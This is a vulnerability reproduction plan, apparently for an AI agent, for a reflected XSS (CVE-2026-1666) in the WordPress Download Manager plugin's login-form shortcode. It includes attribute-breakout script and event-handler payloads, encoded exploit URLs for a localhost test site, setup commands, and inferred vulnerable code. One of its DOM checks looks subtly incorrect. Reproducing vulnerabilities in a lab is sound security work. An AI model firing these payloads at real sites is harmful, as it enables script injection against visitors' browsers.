Research Plan: CVE-2026-1666 Reflected XSS in Download Manager

1. Vulnerability Summary

The Download Manager plugin (<= 3.3.46) is vulnerable to Reflected Cross-Site Scripting (XSS) via the redirect_to GET parameter. This occurs because the plugin's login form shortcode retrieves the redirect_to value from the URL and reflects it into a hidden input field (or similar attribute) without sufficient sanitization or attribute escaping (e.g., missing esc_attr() or esc_url()). An attacker can provide a payload that breaks out of the HTML attribute to execute arbitrary JavaScript in the context of the victim's browser.

2. Attack Vector Analysis

• Endpoint: Any public-facing WordPress Page or Post containing the [wpdm_login_form] shortcode.
• Vulnerable Parameter: redirect_to (GET).
• Authentication Level: Unauthenticated. No login is required to trigger the reflection.
• Preconditions: A page must exist that renders the login form shortcode provided by the plugin.
• Payload: A string designed to break out of an HTML attribute, such as: "><script>alert(document.domain)</script>.

3. Code Flow

1. Entry Point: A user visits a URL such as http://site.test/login-page/?redirect_to=PAYLOAD.
2. Shortcode Registration: The plugin registers the [wpdm_login_form] shortcode (likely in src/User/Shortcodes.php or download-manager.php).
3. Processing Logic: The shortcode callback function (e.g., WPDM\User\Shortcodes::loginForm()) is invoked.
4. Input Retrieval: Inside the shortcode handler or the associated view file (typically src/User/views/login-form.php), the code checks for $_GET['redirect_to'].
5. Vulnerable Sink: The code reflects the value directly into the HTML output.
   • Vulnerable Code (Inferred):

     $redirect_to = isset($_GET['redirect_to']) ? $_GET['redirect_to'] : home_url();
     echo '<input type="hidden" name="redirect_to" value="' . $redirect_to . '" />';
     

   • Missing Protection: The $redirect_to variable is not wrapped in esc_attr() or esc_url().

4. Nonce Acquisition Strategy

This is a Reflected XSS vulnerability in a GET request that renders a form.

• Verification: Viewing a page and rendering a shortcode does not typically require a WordPress nonce.
• Action: No nonce is required for this exploitation. The payload is executed immediately upon the victim loading the malicious URL.

5. Exploitation Strategy

1. Target Identification: Identify or create a page containing the [wpdm_login_form] shortcode.
2. Payload Construction:
   • Base Payload: "><script>alert(document.domain)</script>
   • URL Encoded: %22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
3. Execution:
   • Use the browser_navigate tool to visit the target page with the malicious parameter.
   • Example URL: http://localhost:8080/wpdm-login/?redirect_to=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
4. Detection:
   • Use browser_eval to check if the script was successfully injected into the DOM.
   • Check if a specific global variable or "canary" set by the script exists.

6. Test Data Setup

1. Install Plugin: Ensure download-manager version 3.3.46 is installed and active.
2. Create Vulnerable Page:

   wp post create --post_type=page --post_title="Login" --post_status=publish --post_content='[wpdm_login_form]'
   

3. Verify Slug: Identify the URL of the newly created page (usually /login/).

7. Expected Results

• When the page is loaded with the malicious redirect_to parameter, the resulting HTML should contain:

  <input type="hidden" name="redirect_to" value=""><script>alert(document.domain)</script>" />
  

• The browser will execute the <script> block, triggering the alert.

8. Verification Steps

1. HTTP Response Check:
   Use the http_request tool to fetch the page and check the raw body for the unescaped payload.

   {
     "method": "GET",
     "url": "http://localhost:8080/login/?redirect_to=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"
   }
   

   Success Criteria: The response body contains the string value=""><script>alert(1)</script>".
2. DOM Verification:
   Use browser_eval to confirm the presence of the injected script tag or its side effects.

   // Check if the script tag exists in the DOM
   document.querySelector('script[src*="alert"]') !== null || document.body.innerHTML.includes('><script>alert')
   

9. Alternative Approaches

• Attribute Breakout via Events: If the <script> tag is filtered (unlikely in this context), try an event handler breakout:
  • Payload: x" onfocus="alert(1)" autofocus="
  • URL: ?redirect_to=x%22%20onfocus%3D%22alert(1)%22%20autofocus%3D%22
• JavaScript URI: If the reflection is inside an href or action attribute rather than a value attribute:
  • Payload: javascript:alert(1)
• HTML5 Autocomplete: If the input is visible, use onmouseover or onclick payloads.